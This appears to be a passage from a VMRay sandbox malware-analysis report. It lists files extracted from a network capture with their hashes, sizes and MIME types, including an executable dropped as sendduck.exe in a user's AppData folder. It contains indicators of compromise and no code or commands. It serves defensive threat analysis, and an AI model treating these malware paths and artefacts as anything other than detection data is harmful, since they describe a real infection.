SSDeep 24:gMFH2EoFK8zNj5Gg0Nb6IjHWXYqvxqGQVR+YfWnor1n4F5xlSAI/iCuR:gk2fFJNj4gej2XYUAGW5elSAIJ2
ImpHash None
2378505ba90d0efce5aad0e99f7404aeefea38e63d2143b55c36329a3b6f0565 Downloaded File Text
Unknown
Parent File analysis.pcap
Mime Type text/plain
File Size 246 Bytes
MD5 001f4bf3d1e7e548f9a84edf959c9d3b
SHA1 6b4c77ed2707c61c9261a776d38d36db71612356
SHA256 2378505ba90d0efce5aad0e99f7404aeefea38e63d2143b55c36329a3b6f0565
SSDeep 6:qU9zpQWhfXHTYgbzjrJ9hEI3fX2rP1Qs3yDOUml:qoFQmH8gbzdvPw1T3yE
ImpHash None
2637cb9ee46cc3256cd8577abfc931afd12a96f9981b3fd5827227cf0ba12cd6 Downloaded File Stream
Unknown
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 148 Bytes
MD5 f0ee12fdb4639b948e5db810cffbcdf9
SHA1 19fbe97f86062221d2f2f5f8f7c88bb62687fb34
SHA256 2637cb9ee46cc3256cd8577abfc931afd12a96f9981b3fd5827227cf0ba12cd6
SSDeep 3:zsm31FFTfIjvjlHDX3WDAMgVlRFR4TH0fjF5npVbeL1apsVeHy:ImNfIjhjX3cAMUNlfDpVbeJg0eS
ImpHash None
2e938bc4a4775df9b8d1200c344378e26384af7577fd8c2d382be2276671f74b Downloaded File Stream
Unknown
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 1.89 MB
MD5 abc9f7b977a37b2baf61d89b79abf6d5
SHA1 a672154e14fdadec89e313b2dfa9424b089e9f34
SHA256 2e938bc4a4775df9b8d1200c344378e26384af7577fd8c2d382be2276671f74b
SSDeep 49152:6en2yKE4qSAHe6786HdIlFrLCSVsVQ/MMRTbMaMk7HABNOz:Dn2zqSA+S866FyVUMad7gBNOz
ImpHash None
71f317489fbcb825c6bdf67306ec7bbfb0b633d36a3ed6fb3d98e41f013c0ae5 Downloaded File Stream
Unknown
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 132 Bytes
MD5 4ce233ff9b0068e71fa5c462d9f0667d
SHA1 fb253aab6a23712337c741607625ff6bd2839356
SHA256 71f317489fbcb825c6bdf67306ec7bbfb0b633d36a3ed6fb3d98e41f013c0ae5
SSDeep 3:ytMdfeD8jTKNSKGl3pA4ovPxqg/S5EgeHosi6eS:ytcfI8CNYlZLovJqgYmv1
ImpHash None
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduck.exe Downloaded File Binary
Unknown
Also Known As C:\Users\aETAdzjz\186.exe (Downloaded File)
4GrqfSPj4IvR.exe (Embedded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 884.25 KB
MD5 1ada9d6e0e7858c79e8fcfc6e4c385d2
SHA1 446104d79d7658a61a3b9da2cec4094d670ce991
SHA256 75c620faf2e8aaad8162ad086e48556233c578f5dbcc6d4a65d4982e94ff34c3
SSDeep 12288:vKKHHuBLe0OVaImhgnXLBakHEKJcJpL/CDFhuksHpZ/s:vZH2hgnla2EKJcH/6+VY
ImpHash None
8e1ae0723fecadc45d941aecb35a413a7d262fa8bb4a83a85a6a2a9b53b93867 Downloaded File Stream
Unknown
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 148 Bytes
MD5 991ef62a831fe814065161224d2bc3c0
SHA1 0a8ae73092012efe045614d256b6d13abddbb3c7
SHA256 8e1ae0723fecadc45d941aecb35a413a7d262fa8bb4a83a85a6a2a9b53b93867
SSDeep 3:fe0cglwRNrzwc4wPUyZLq1Rg0BJFjLfVpFvMBeWXGWn:fUuYzwRVR/BJFjvFvzQGW
ImpHash None
9cf8b440553c89e47b7a895540e1f03075b7f15bea22ae8a228133a7e0555006 Downloaded File Text
Unknown
Parent File analysis.pcap
Mime Type text/plain
File Size 235 Bytes
MD5 c73f93d59b9391ac4b922aa97b6086dd
SHA1 aceac5aceba3ea8d9adc2d40d36fbfab445bbfbb
SHA256 9cf8b440553c89e47b7a895540e1f03075b7f15bea22ae8a228133a7e0555006
SSDeep 3:IuUKIc/1a1agcn1MNWQK7CvX/QKK/N9ngSnnxoQfTqJAOx8Llzu1hBVd2nwHd1yD:IuUbctD2NECHQKWngTQGlL2nwC/e2B
ImpHash None
b76e9f86695cd63c763553bd860c3bf7918a7971160bc1bac7b054ad058f2648 Downloaded File Text
Unknown
Parent File analysis.pcap
Mime Type text/plain
File Size 252 Bytes
MD5 b02489508f2ef9789b688e44a97bf8d6
SHA1 355cc89ad955e588cea152b103a7c22c73bf036a
SHA256 b76e9f86695cd63c763553bd860c3bf7918a7971160bc1bac7b054ad058f2648
SSDeep 6:5oWLKXyGV0aG4Cm7rZwLXgZB/Yr5jX3raNtxgt:5o6KXympXCm7r+L8wN3rcA
ImpHash None
bc695b3c606220452b883b30a00834c047a64a8f9fcd9345be7fe7dd80cb3d9a Downloaded File Text
Unknown
Parent File analysis.pcap
Mime Type text/plain
File Size 252 Bytes
MD5 3a5afdd64f6a8c1f7a8283ff79e2e916
SHA1 cda8cee7eb48d903075d897a0fc706cf7e1c1508
SHA256 bc695b3c606220452b883b30a00834c047a64a8f9fcd9345be7fe7dd80cb3d9a
SSDeep 6:2Mo+Fu3TW8Vcuqm0eUS3lBSMLkXMb7aeA0:2H+4WycvmZUSP8Mx/
ImpHash None
c87760958d4fe8a3a8c51760f0fd445e65028fcfea3010263a59cd84e724cf15 Downloaded File Stream
Unknown
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 14.19 KB
MD5 ae7cdfbac191053906ebec37ebc852b1
SHA1 880378824351f398e793ba2a917edf14f416dfd1
SHA256 c87760958d4fe8a3a8c51760f0fd445e65028fcfea3010263a59cd84e724cf15
SSDeep 384:gN8TTnHp2aeaZ4m3rpmGNVNHt8dzSetZe2cvIMrSTPfA1SA7:nTzhP1mG5t8o2cvIM6Pff+
ImpHash None
ed0031bde979f0f8c7373c948c6383539e092da37c2fa5a1461ccf039c640143 Downloaded File Stream
Unknown
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 148 Bytes
MD5 ab978eeab8dba7ed010ad8e9e749d897
SHA1 be8f858c3425c15bae717e652a51b9638031450a
SHA256 ed0031bde979f0f8c7373c948c6383539e092da37c2fa5a1461ccf039c640143
SSDeep 3:fe0cglwRNrzwc4wPUyZLq1Rg0BJFjLfLmvs9wviu+Uvxr+p:fUuYzwRVR/BJFj3mEFAvxr+p
ImpHash None
f80bef0f7aed816867b8c49775c3c387fdb22ce02caef5e59d3c2fe9b5abcaa5 Downloaded File Text
Unknown
Parent File analysis.pcap
Mime Type text/plain
File Size 1.18 KB
MD5 096025b556bcd4859a618818bf19c3b7
SHA1 286458887efcf22a728873aee63140b6e389c7b9
SHA256 f80bef0f7aed816867b8c49775c3c387fdb22ce02caef5e59d3c2fe9b5abcaa5
SSDeep 24:vilSWIJ8/3sHR/yHbNYlq5ET19eBNQmXdE493Ueui/QwN:atcIClqT/Qmn933X/r
ImpHash None
C:\Users\aETAdzjz\AppData\Local\Temp\D2A9.tmp Dropped File Unknown
Not Queried
Also Known As C:\Users\aETAdzjz\AppData\Local\Temp\D394.tmp (Dropped File)
c:\users\aetadzjz\appdata\roaming\microsoft\forms\winword.box (Dropped File)
Mime Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash None
Function Logfile

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.